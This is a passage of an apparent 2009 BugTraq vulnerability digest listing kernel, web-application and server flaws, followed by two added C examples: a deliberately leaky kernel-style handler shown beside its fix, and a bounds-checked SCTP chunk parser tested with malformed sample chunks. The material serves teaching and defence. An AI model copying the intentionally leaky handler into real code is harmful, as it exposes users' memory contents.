An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

These issues affect net2ftp 0.98 and earlier.

33. Tor Unspecified Remote Memory Corruption Vulnerability
BugTraq ID: 33399
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33399
Summary:
Tor is prone to a memory-corruption issue.

Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the user running the application. Failed exploit attempts will likely result in denial-of-service conditions.

This issue affects versions prior to Tor 0.2.0.33.

34. Tor Multiple Denial of Service Vulnerabilities
BugTraq ID: 33713
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33713
Summary:
Tor is prone to multiple vulnerabilities.

Attackers can exploit these issues to cause denial-of-service conditions.

These issues affect versions prior to Tor 0.2.0.34.

35. Tor Security Bypass And Privilege Escalation Weaknesses
BugTraq ID: 32648
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/32648
Summary:
Tor is prone to multiple weaknesses that may allow attackers to exploit other vulnerabilities, facilitating privilege-escalation and security-bypass attacks.

These issues affect versions prior to Tor 0.2.0.32.

36. Ots Labs OtsTurntables OFL File Buffer Overflow Vulnerability
BugTraq ID: 33257
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33257
Summary:
Ots Labs OtsTurntables is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input.

Attackers may be able to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

OtsTurntables 1.00.027 is vulnerable; other versions may also be affected.

37. AdaptBB Multiple Input Validation Vulnerabilities
BugTraq ID: 34452
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34452
Summary:
AdaptBB is prone to multiple security vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include multiple SQL-injection issues, an arbitrary-file-upload issue, and an arbitrary-command-execution issue.

Exploiting these issues can allow an attacker to upload and execute arbitrary files, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Other attacks may also be possible.

AdaptBB 1.0 Beta is vulnerable; other versions may also be affected.

38. Linux Kernel CIFS Remote Buffer Overflow Vulnerability
BugTraq ID: 34453
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34453
Summary:
The Linux Kernel is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.

The issue affects Linux Kernel 2.6.29; other versions may also be vulnerable.

39. Maian Music Joomla! Component 'category' Parameter SQL Injection Vulnerability
BugTraq ID: 34432
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34432
Summary:
The Maian Music component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Maian Music 1.2.1 is vulnerable; other versions may also be affected.

40. Cisco Subscriber Edge Services Manager Cross Site Scripting And HTML Injection Vulnerabilities
BugTraq ID: 34454
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34454
Summary:
Cisco Subscriber Edge Services Manager is prone to an unspecified cross-site scripting vulnerability and an unspecified HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

We don't know which versions of Subscriber Edge Services Manager are affected. We will update this BID as more information emerges.

41. Linksys WRT160N Wireless Router Cross-Site Request Forgery Vulnerability
BugTraq ID: 34448
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34448
Summary:
The Linksys WRT160N wireless router is prone to a cross-site request-forgery vulnerability.

Successful exploits can run privileged commands on the affected device, including enabling remote access to the web administration interface. This may lead to further network-based attacks.

Linksys WRT160N running firmware 1.02.2 is vulnerable.

42. HP ProCurve Manager and ProCurve Manager Plus Unauthorized Access Vulnerability
BugTraq ID: 34451
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34451
Summary:
HP ProCurve Manager and ProCurve Manager Plus are prone to an unspecified unauthorized-access vulnerability. Remote attackers may exploit this issue to gain unauthorized access to data.

The following are vulnerable:

ProCurve Manager 3.2 and earlier
ProCurve Manager Plus 3.2 and earlier

43. Cisco Unified Communications Manager SIP Service Multiple Denial of Service Vulnerabilities
BugTraq ID: 31367
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/31367
Summary:
Cisco Unified Communications Manager is prone to multiple denial-of-service vulnerabilities.

These issues affect the Session Initiation Protocol (SIP) service.

These issues are documented by Cisco bug IDs CSCsu38644 and CSCsm46064.

An attacker can exploit these issues to cause denial-of-service conditions in the affected application.

44. Sun Java Runtime Environment and Java Development Kit Multiple Security Vulnerabilities
BugTraq ID: 34240
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34240
Summary:
Sun Java Runtime Environment and Java Development Kit are prone to multiple security vulnerabilities.

Successful exploits may allow attackers to violate the same-origin policy, obtain sensitive information, bypass security restrictions, run untrusted applets with elevated privileges, and cause denial-of-service conditions. This may result in a compromise of affected computers.

These issues affect versions *prior to* the following:

JDK and JRE 6 Update 13
JDK and JRE 5.0 Update 18
SDK and JRE 1.4.2_20
SDK and JRE 1.3.1_25

45. Microsoft April 2009 Advance Notification Multiple Vulnerabilities
BugTraq ID: 34450
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34450
Summary:
Microsoft has released advance notification that the vendor will be releasing eight security bulletins on April 14, 2009. The highest severity rating for these issues is 'Critical'.

These issues affect Windows, Internet Explorer, Office, Excel, and ISA Server.

Successfully exploiting these issues may allow remote or local attackers to compromise affected computers.

Individual records will be created to document these issues when the bulletins are released.

46. ClamAV Prior to 0.95.1 Multiple Remote Denial of Service Vulnerabilities
BugTraq ID: 34446
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34446
Summary:
ClamAV is prone to multiple denial-of-service vulnerabilities when handling malformed files or specially crafted URIs.

Successfully exploiting these issues allows remote attackers to deny service to legitimate users. Given the nature of these issues, attackers may also be able to run arbitrary code, but this has not been confirmed.

Versions prior to ClamAV 0.95.1 are vulnerable.

47. Ghostscript 'jbig2dec' JBIG2 Processing Buffer Overflow Vulnerability
BugTraq ID: 34445
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34445
Summary:
Ghostscript is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it into a finite-sized buffer.

Exploiting this issue may allow remote attackers to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions.

Ghostscript 8.64 is vulnerable; other versions may also be affected.

48. IBM Lotus Domino IMAP Server Remote Denial of Service Vulnerability
BugTraq ID: 34441
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34441
Summary:
IBM Lotus Domino IMAP server is prone to a remote denial-of-service vulnerability because the software fails to properly handle certain email attachments.

Successfully exploiting this issue allows remote attackers to crash the affected server, denying further service to legitimate users.

IBM Lotus Domino 8.5 and 8.0.2.1 are vulnerable; other versions may be affected as well.

49. MIT Kerberos 'NegTokenInit' Token Handling Remote Denial Of Service Vulnerability
BugTraq ID: 34257
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34257
Summary:
MIT Kerberos is prone to a remote denial-of-service vulnerability.

An attacker may exploit this issue to crash vulnerable servers, resulting in denial-of-service conditions.

MIT Kerberos 5 1.6.3 is vulnerable; other versions may also be affected.

50. IBM Tivoli Storage Manager Multiple Vulnerabilities
BugTraq ID: 34285
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34285
Summary:
IBM Tivoli Storage Manager is prone to multiple vulnerabilities.

Attackers can exploit these issues to cause denial-of-service conditions or bypass certain security restrictions. The impact of one of the issues is unknown.

These issues affect versions prior to IBM Tivoli Storage Manager 6.1.

51. MIT Kerberos SPNEGO and ASN.1 Multiple Remote Denial Of Service Vulnerabilities
BugTraq ID: 34408
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34408
Summary:
MIT Kerberos is prone to multiple remote denial-of-service vulnerabilities.

An attacker may exploit these issues to crash vulnerable servers, resulting in denial-of-service conditions. Some of these issues may allow attackers to obtain sensitive information.

MIT Kerberos 5 1.6.3 is vulnerable; other versions may also be affected.

52. MIT Kerberos 'asn1_decode_generaltime()' Uninitialized Pointer Memory Corruption Vulnerability
BugTraq ID: 34409
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34409
Summary:
MIT Kerberos is prone to a memory-corruption vulnerability because it fails to properly initialize data structures.

Successful exploits may allow remote attackers to crash Kerberos servers, including the 'kadmind' administration daemon. Given the nature of this issue, attackers may also be able to execute arbitrary code with SYSTEM-level or superuser privileges, but this has not been confirmed.

Versions prior to Kerberos 5 1.7 and 5 1.6.4 are vulnerable.

53. InnerMedia DynaZip ZIP Archive Handling Multiple Buffer Overflow Vulnerabilities
BugTraq ID: 19143
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/19143
Summary:
DynaZip is prone to multiple remote buffer-overflow vulnerabilities when handling malicious ZIP archives.

A successful attack can allow a remote attacker to corrupt process memory by triggering an overflow condition. This may lead to arbitrary code execution in the context of an affected user and facilitate a remote compromise.

These vulnerabilities affect the following:

DynaZip Max with DZIP32.DLL 5.0.0.7
DynaZip Max Secure with DZIPS32.DLL 6.0.0.4

Other versions may be vulnerable as well.

NOTE: TurboZIP 6.0 Build 002021004 is also affected by the first issue because it uses the DynaZip library.

54. OpenSSL Multiple Vulnerabilities
BugTraq ID: 34256
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34256
Summary:
OpenSSL is prone to multiple vulnerabilities that may allow attackers to trigger denial-of-service conditions or bypass certain security checks.

Versions prior to OpenSSL 0.9.8k are vulnerable.

55. ejabberd MUC Logs Cross Site Scripting Vulnerability
BugTraq ID: 34133
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34133
Summary:
The 'ejabberd' application is prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.

Versions prior to ejabberd 2.0.4 are vulnerable.

56. Avahi 'avahi-core/server.c' Multicast DNS Denial Of Service Vulnerability
BugTraq ID: 33946
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33946
Summary:
Avahi is prone to a denial-of-service vulnerability.

A remote attacker may exploit this issue to crash the affected application, denying further service to legitimate users.

Avahi 0.6.23 is vulnerable; other versions may also be affected.

57. FFmpeg 'libavformat/4xm.c' Remote Code Execution Vulnerability
BugTraq ID: 33502
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33502
Summary:
FFmpeg is prone to a remote code-execution vulnerability because it fails to adequately validate user-supplied input.

An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Versions prior to FFmpeg trunk revision 16846 are vulnerable.

58. PHP 'imageRotate()' Uninitialized Memory Information Disclosure Vulnerability
BugTraq ID: 33002
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33002
Summary:
PHP is prone to an information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

PHP 5.2.8 and prior versions are vulnerable.

59. Net-SNMP 'snmpUDPDomain.c' Remote Information Disclosure Vulnerability
BugTraq ID: 33755
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33755
Summary:
Net-SNMP is prone to a remote information-disclosure vulnerability because it fails to properly handle TCP Wrapper authorization rules.

Exploiting this issue will allow attackers to obtain sensitive information that can help them launch further attacks.

Net-SNMP 5.4.2.1 is vulnerable; other versions are also likely affected.

60. Gretech GOM Player '.srt' File Remote Buffer Overflow Vulnerability
BugTraq ID: 34427
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34427
Summary:
Gretech GOM Player is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

GOM Player 2.1.16.4613 is vulnerable; other versions may also be affected.

61. Joomla! 'com_mailto' Component 'article' Parameter SQL Injection Vulnerability
BugTraq ID: 34433
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34433
Summary:
The 'com_mailto' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

We don't know which versions of Joomla! are affected. We will update this BID as more information emerges.

62. Joomla! cmimarketplace Component 'viewit' Parameter Directory Traversal Vulnerability
BugTraq ID: 34431
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34431
Summary:
The 'cmimarketplace' component for Joomla! is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.

This issue affects cmimarketplace 0.1; other versions may also be affected.

63. Horde Products Local File Include and Cross Site Scripting Vulnerabilities
BugTraq ID: 33491
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33491
Summary:
Horde products are prone to a local file-include vulnerability and a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.

An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.

The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

The issues affect versions prior to the following:

Horde 3.2.4 and 3.3.3
Horde Groupware 1.1.5

64. Horde Turba 'services/obrowser/index.php' HTML Injection Vulnerability
BugTraq ID: 29745
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/29745
Summary:
Horde Turba is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

Horde 3.1.7, 3.2, and prior versions are vulnerable.

65. Horde XSS Filter Cross Site Scripting Vulnerability
BugTraq ID: 33367
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33367
Summary:
Horde is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Note that this issue also affects Turba on Horde IMP.

Versions prior to Horde 3.2.3 and 3.3.1 are vulnerable.

66. Linux Kernel 'exit_notify()' CAP_KILL Verification Local Privilege Escalation Vulnerability
BugTraq ID: 34405
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34405
Summary:
The Linux kernel is prone to a local privilege-escalation vulnerability.

A local attacker can exploit this issue to execute arbitrary code with superuser privileges, resulting in a complete compromise of the affected computer.

Versions prior to Linux kernel 2.6.29-git14 are vulnerable.

67. Bugzilla 'attachment.cgi' Cross Site Request Forgery Vulnerability
BugTraq ID: 34308
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34308
Summary:
Bugzilla is prone to a cross-site request-forgery vulnerability.

An attacker can exploit this issue to submit attachments in the context of the logged-in user.

This issue affects versions prior to Bugzilla 3.2.3 and 3.3.4.

68. LinPHA 1.3.4 Multiple Cross-Site Scripting Vulnerabilities
BugTraq ID: 34422
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34422
Summary:
LinPHA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input data.

Attackers can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help attackers steal cookie-based authentication credentials and launch other attacks.

LinPHA 1.3.4 is vulnerable; other versions may also be affected.

69. Xplode 'module_wrapper.asp' SQL Injection and Cross Site Scripting Vulnerabilities
BugTraq ID: 34419
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34419
Summary:
Xplode is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

70. Linux Kernel 'sock.c' SO_BSDCOMPAT Option Information Disclosure Vulnerability
BugTraq ID: 33846
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33846
Summary:
The Linux Kernel is prone to an information-disclosure vulnerability because it fails to properly initialize certain memory before using it in a user-accessible operation.

Successful exploits will allow attackers to view portions of kernel memory. Information harvested may be used in further attacks.

Versions prior to Linux Kernel 2.6.28.8 are vulnerable.
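
Added illustration, not the kernel's sock.c (which this entry does not quote): the general pattern behind this class of bug, a getsockopt-style handler that sets one field of a stack object and copies the whole object out, beside the hardened form that zeroes the object and copies only what it initialised. The reply structure, the stale-data marker byte standing in for leftover kernel stack contents, and the copy_to_user stand-in are this example's own assumptions.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define STALE_MARKER 0xAA   /* stands in for whatever last occupied the kernel stack */

/* Reply for a hypothetical integer socket option: only .value is meaningful,
 * the rest is padding that a careless handler never touches. */
struct opt_reply {
    int32_t value;
    uint8_t  pad[12];
};

/* Stand-in for copy_to_user(): copy at most the caller's buffer length. */
static size_t copy_to_user_sim(uint8_t *user, size_t user_len,
                               const void *kern, size_t kern_len)
{
    size_t n = user_len < kern_len ? user_len : kern_len;
    memcpy(user, kern, n);
    return n;
}

/* Leaky handler: sets .value but copies sizeof(*r) bytes, so the untouched
 * padding (stale stack contents) is shipped to user space. */
size_t getopt_leaky(struct opt_reply *r, int32_t value,
                    uint8_t *user, size_t user_len)
{
    r->value = value;
    return copy_to_user_sim(user, user_len, r, sizeof *r);
}

/* Hardened handler: zero the whole object first, then copy only the bytes
 * that were deliberately initialised for this option. */
size_t getopt_fixed(struct opt_reply *r, int32_t value,
                    uint8_t *user, size_t user_len)
{
    memset(r, 0, sizeof *r);
    r->value = value;
    return copy_to_user_sim(user, user_len, r, sizeof r->value);
}

/* How many bytes of the user buffer still carry the stale marker? */
size_t leaked_bytes(const uint8_t *user, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (user[i] == STALE_MARKER)
            n++;
    return n;
}

/* Simulate one getsockopt() call against a stack slot full of stale data and
 * report how many stale bytes the caller ended up with. */
size_t demo_leak(int use_fixed)
{
    struct opt_reply slot;                 /* the "kernel stack" object */
    uint8_t user[sizeof slot];             /* the "user" output buffer */
    memset(&slot, STALE_MARKER, sizeof slot);
    memset(user, 0, sizeof user);
    if (use_fixed)
        getopt_fixed(&slot, 1, user, sizeof user);
    else
        getopt_leaky(&slot, 1, user, sizeof user);
    return leaked_bytes(user, sizeof user);
}

int main(void)
{
    printf("leaky handler: %zu stale bytes reach user space\n", demo_leak(0));
    printf("fixed handler: %zu stale bytes reach user space\n", demo_leak(1));
    return 0;
}
```

The same two rules (initialise the whole object, copy only the length actually filled) close most kernel-to-user information leaks of this kind, including those caused by compiler-inserted structure padding that no field assignment ever touches.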

71. Linux Kernel 'FWD-TSN' Chunk Remote Buffer Overflow Vulnerability
BugTraq ID: 33113
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33113
Summary:
The Linux Kernel is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.

The issue affects Linux Kernel 2.6.28; other versions may also be vulnerable.
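
Added example, not the kernel's SCTP code: a bounds-checked parser for the FORWARD TSN chunk, using the RFC 3758 layout (4-byte chunk header, 4-byte new cumulative TSN, then 4-byte stream/sequence pairs), showing the checks a receiver must make on the chunk's own Length field before walking the variable part. The sample chunks are constructed, not captured traffic, and the 64-entry output cap is this example's assumption.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <inttypes.h>

#define SCTP_CID_FWD_TSN   192   /* chunk type, RFC 3758 */
#define FWD_TSN_HDR_LEN    8     /* type(1) flags(1) length(2) new_cum_tsn(4) */
#define FWD_TSN_SKIP_LEN   4     /* stream id(2) stream sequence(2) */
#define FWD_TSN_MAX_SKIPS  64    /* assumed cap for this example's fixed-size output */

struct fwd_tsn_skip { uint16_t stream; uint16_t ssn; };

struct fwd_tsn {
    uint32_t new_cum_tsn;
    size_t   nskips;
    struct fwd_tsn_skip skips[FWD_TSN_MAX_SKIPS];
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Parse one FORWARD TSN chunk. `buf_len` is what was actually received; the
 * chunk's own Length field is attacker-controlled and is validated against it
 * before anything past the fixed header is read. Returns 0 on success or a
 * negative code naming the check that failed. */
int parse_fwd_tsn(const uint8_t *buf, size_t buf_len, struct fwd_tsn *out)
{
    if (buf_len < FWD_TSN_HDR_LEN)       return -1;  /* header itself truncated */
    if (buf[0] != SCTP_CID_FWD_TSN)      return -2;  /* not this chunk type */

    uint16_t claimed = rd16(buf + 2);
    if (claimed < FWD_TSN_HDR_LEN)       return -3;  /* length undercuts the header */
    if (claimed > buf_len)               return -4;  /* length overruns the packet */

    size_t var = claimed - FWD_TSN_HDR_LEN;          /* safe: claimed >= header */
    if (var % FWD_TSN_SKIP_LEN != 0)     return -5;  /* partial skip entry */
    size_t n = var / FWD_TSN_SKIP_LEN;
    if (n > FWD_TSN_MAX_SKIPS)           return -6;  /* more than we can store */

    out->new_cum_tsn = rd32(buf + 4);
    out->nskips = n;
    for (size_t i = 0; i < n; i++) {
        const uint8_t *e = buf + FWD_TSN_HDR_LEN + i * FWD_TSN_SKIP_LEN;
        out->skips[i].stream = rd16(e);
        out->skips[i].ssn    = rd16(e + 2);
    }
    return 0;
}

/* Constructed sample chunks (not captured traffic). */
const uint8_t fwd_tsn_good[16] = {
    0xC0, 0x00, 0x00, 0x10,        /* type 192, flags 0, length 16 */
    0x00, 0x00, 0x00, 0x2A,        /* new cumulative TSN = 42 */
    0x00, 0x01, 0x00, 0x05,        /* skip stream 1, SSN 5 */
    0x00, 0x02, 0x00, 0x07         /* skip stream 2, SSN 7 */
};
/* Length field (4) smaller than the fixed header: an unchecked
 * "claimed - header" would wrap to a huge entry count. */
const uint8_t fwd_tsn_undersized[8] = {
    0xC0, 0x00, 0x00, 0x04,  0x00, 0x00, 0x00, 0x2A
};
/* Length field (256) larger than the 8 bytes actually received. */
const uint8_t fwd_tsn_overclaimed[8] = {
    0xC0, 0x00, 0x01, 0x00,  0x00, 0x00, 0x00, 0x2A
};

int main(void)
{
    struct fwd_tsn f;
    int rc = parse_fwd_tsn(fwd_tsn_good, sizeof fwd_tsn_good, &f);
    printf("good:        rc=%d skips=%zu cum_tsn=%" PRIu32 "\n", rc, f.nskips, f.new_cum_tsn);
    rc = parse_fwd_tsn(fwd_tsn_undersized, sizeof fwd_tsn_undersized, &f);
    printf("undersized:  rc=%d\n", rc);
    rc = parse_fwd_tsn(fwd_tsn_overclaimed, sizeof fwd_tsn_overclaimed, &f);
    printf("overclaimed: rc=%d\n", rc);
    return 0;
}
```

The two checks on the Length field are the ones that matter: a value below the fixed header size turns an unsigned subtraction into an enormous entry count, and a value above the received length makes the walk read past the packet. Both must be tested before the variable part is touched.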

72. Linux Kernel 'seccomp' System Call Security Bypass Vulnerability
BugTraq ID: 33948
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33948
Summary:
The Linux kernel is prone to a local security-bypass vulnerability.

A local attacker may be able to exploit this issue to bypass access control and make restricted system calls, which may result in an elevation of privileges.

73. Linux Kernel '/ipc/shm.c' Local Denial of Service Vulnerability
BugTraq ID: 34020
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34020
Summary:
The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause the Linux kernel to lock up, resulting in a denial-of-service condition.

Versions prior to Linux kernel 2.6.28.5 are vulnerable.

74. Linux Kernel 'dell_rbu' Local Denial of Service Vulnerabilities
BugTraq ID: 33428
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33428
Summary:
Linux Kernel is prone to two denial-of-service vulnerabilities.

A local unprivileged attacker can exploit these issues to cause a vulnerable system to crash, resulting in denial-of-service conditions.

These issues affect versions prior to Linux Kernel 2.6.27.13 and 2.6.28.2.

75. Linux Kernel Audit System 'audit_syscall_entry()' System Call Security Bypass Vulnerability
BugTraq ID: 33951
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33951
Summary:
The Linux kernel is prone to a local security-bypass vulnerability.

A local attacker may be able to exploit this issue to bypass audit mechanisms imposed on system calls. This may allow malicious behavior to escape notice.

76. Linux Kernel Cloned Process 'CLONE_PARENT' Local Origin Validation Weakness
BugTraq ID: 33906
Remote: No
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/33906
Summary:
The Linux kernel is prone to an origin-validation weakness when dealing with signal handling.

This weakness occurs when a privileged process runs attacker-supplied programs as child processes. Attackers may exploit this to send arbitrary signals to the privileged parent process.

A local attacker may exploit this issue to kill vulnerable processes, resulting in a denial-of-service condition. In some cases, other attacks may also be possible.

Linux kernel 2.6.28 is vulnerable; other versions may also be affected.

77. XIGLA Absolute Form Processor XE 'login.asp' SQL Injection Vulnerability
BugTraq ID: 34463
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34463
Summary:
Absolute Form Processor XE is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Absolute Form Processor XE 1.5 is vulnerable; other versions may also be affected.

78. WebFileExplorer 'body.asp' SQL Injection Vulnerability
BugTraq ID: 34462
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34462
Summary:
WebFileExplorer is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

WebFileExplorer 3.1 is vulnerable; other versions may also be affected.

79. SWF Opener Buffer Overflow Vulnerability
BugTraq ID: 34459
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34459
Summary:
SWF Opener is prone to a remote buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.

Successful exploits may allow an attacker to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

SWF Opener 1.3 is vulnerable; other versions may also be affected.

80. BackendCMS 'main.asp' SQL Injection Vulnerability
BugTraq ID: 34455
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34455
Summary:
BackendCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

BackendCMS 5.0 is vulnerable; other versions may also be affected.

81. EMC RepliStor Multiple Remote Heap Based Buffer Overflow Vulnerabilities
BugTraq ID: 34449
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34449
Summary:
EMC RepliStor is prone to multiple remote heap-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input.

A remote attacker can exploit these issues to execute arbitrary code with SYSTEM-level privileges. Successfully exploiting these issues will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition.

Versions prior to RepliStor 6.2 SP5 and RepliStor 6.3 SP2 are vulnerable.

82. IBM BladeCenter Advanced Management Module Multiple Remote Vulnerabilities
BugTraq ID: 34447
Remote: Yes
Last Updated: 2009-04-09
Relevant URL: http://www.securityfocus.com/bid/34447
Summary:
IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:

- An HTML-injection vulnerability
- A cross-site scripting vulnerability
- An information-disclosure vulnerability
- Multiple cross-site request-forgery vulnerabilities

An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.

Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable.

83. Linux Kernel SPARC 'mremap()' Multiple Denial Of Service Vulnerabilities
BugTraq ID: 33836
Remote: No
